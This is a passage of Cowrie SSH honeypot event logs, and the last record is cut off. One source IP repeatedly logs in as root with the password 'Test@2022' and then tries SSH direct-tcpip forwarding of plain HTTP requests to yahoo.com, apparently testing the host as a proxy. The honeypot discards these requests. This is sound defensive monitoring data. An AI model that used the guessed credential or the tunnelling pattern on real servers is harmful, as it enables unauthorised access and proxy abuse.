{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:36.156675Z","src_ip":"213.209.150.239","session":"84dd11683add"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:36.204530Z","src_ip":"213.209.150.239","session":"84dd11683add"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37346,"dst_ip":"1.2.3.4","dst_port":22,"session":"e469ef683632","protocol":"ssh","message":"New connection: 213.209.150.239:37346 (1.2.3.4:22) [session: e469ef683632]","sensor":"my-vps","timestamp":"2025-08-26T01:05:36.250558Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:36.251431Z","src_ip":"213.209.150.239","session":"e469ef683632"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:36.298566Z","src_ip":"213.209.150.239","session":"e469ef683632"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:36.533185Z","src_ip":"213.209.150.239","session":"e469ef683632"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":24850,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:24850","sensor":"my-vps","timestamp":"2025-08-26T01:05:36.581766Z","session":"e469ef683632"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:36.629022Z","src_ip":"213.209.150.239","session":"e469ef683632"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":18597,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:18597","sensor":"my-vps","timestamp":"2025-08-26T01:05:36.765504Z","session":"e469ef683632"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:36.812925Z","src_ip":"213.209.150.239","session":"e469ef683632"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:36.860848Z","src_ip":"213.209.150.239","session":"e469ef683632"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37387,"dst_ip":"1.2.3.4","dst_port":22,"session":"882e425a9cab","protocol":"ssh","message":"New connection: 213.209.150.239:37387 (1.2.3.4:22) [session: 882e425a9cab]","sensor":"my-vps","timestamp":"2025-08-26T01:05:36.907082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:36.907716Z","src_ip":"213.209.150.239","session":"882e425a9cab"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:36.955128Z","src_ip":"213.209.150.239","session":"882e425a9cab"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:37.191040Z","src_ip":"213.209.150.239","session":"882e425a9cab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":29382,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:29382","sensor":"my-vps","timestamp":"2025-08-26T01:05:37.239285Z","session":"882e425a9cab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:37.286482Z","src_ip":"213.209.150.239","session":"882e425a9cab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":24638,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:24638","sensor":"my-vps","timestamp":"2025-08-26T01:05:37.421476Z","session":"882e425a9cab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:37.468626Z","src_ip":"213.209.150.239","session":"882e425a9cab"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:37.516793Z","src_ip":"213.209.150.239","session":"882e425a9cab"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37443,"dst_ip":"1.2.3.4","dst_port":22,"session":"12f30b0ee116","protocol":"ssh","message":"New connection: 213.209.150.239:37443 (1.2.3.4:22) [session: 12f30b0ee116]","sensor":"my-vps","timestamp":"2025-08-26T01:05:37.562742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:37.563687Z","src_ip":"213.209.150.239","session":"12f30b0ee116"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:37.610722Z","src_ip":"213.209.150.239","session":"12f30b0ee116"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:37.845303Z","src_ip":"213.209.150.239","session":"12f30b0ee116"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":24193,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:24193","sensor":"my-vps","timestamp":"2025-08-26T01:05:37.893465Z","session":"12f30b0ee116"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:37.940871Z","src_ip":"213.209.150.239","session":"12f30b0ee116"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":16570,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:16570","sensor":"my-vps","timestamp":"2025-08-26T01:05:38.077844Z","session":"12f30b0ee116"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:38.125421Z","src_ip":"213.209.150.239","session":"12f30b0ee116"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:38.173598Z","src_ip":"213.209.150.239","session":"12f30b0ee116"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37492,"dst_ip":"1.2.3.4","dst_port":22,"session":"640f6de95109","protocol":"ssh","message":"New connection: 213.209.150.239:37492 (1.2.3.4:22) [session: 640f6de95109]","sensor":"my-vps","timestamp":"2025-08-26T01:05:38.229375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:38.230033Z","src_ip":"213.209.150.239","session":"640f6de95109"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:38.286937Z","src_ip":"213.209.150.239","session":"640f6de95109"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:38.569545Z","src_ip":"213.209.150.239","session":"640f6de95109"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":32296,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:32296","sensor":"my-vps","timestamp":"2025-08-26T01:05:38.627297Z","session":"640f6de95109"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:38.684438Z","src_ip":"213.209.150.239","session":"640f6de95109"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":18512,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:18512","sensor":"my-vps","timestamp":"2025-08-26T01:05:38.838999Z","session":"640f6de95109"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:38.896218Z","src_ip":"213.209.150.239","session":"640f6de95109"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:38.953654Z","src_ip":"213.209.150.239","session":"640f6de95109"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37548,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfb7d37779f5","protocol":"ssh","message":"New connection: 213.209.150.239:37548 (1.2.3.4:22) [session: dfb7d37779f5]","sensor":"my-vps","timestamp":"2025-08-26T01:05:39.009127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:39.009969Z","src_ip":"213.209.150.239","session":"dfb7d37779f5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:39.066444Z","src_ip":"213.209.150.239","session":"dfb7d37779f5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:39.348516Z","src_ip":"213.209.150.239","session":"dfb7d37779f5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":32722,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:32722","sensor":"my-vps","timestamp":"2025-08-26T01:05:39.406086Z","session":"dfb7d37779f5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:39.463565Z","src_ip":"213.209.150.239","session":"dfb7d37779f5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":25833,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:25833","sensor":"my-vps","timestamp":"2025-08-26T01:05:39.618994Z","session":"dfb7d37779f5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:39.675763Z","src_ip":"213.209.150.239","session":"dfb7d37779f5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:39.733441Z","src_ip":"213.209.150.239","session":"dfb7d37779f5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37596,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd40d247541a","protocol":"ssh","message":"New connection: 213.209.150.239:37596 (1.2.3.4:22) [session: dd40d247541a]","sensor":"my-vps","timestamp":"2025-08-26T01:05:39.779586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:39.780214Z","src_ip":"213.209.150.239","session":"dd40d247541a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2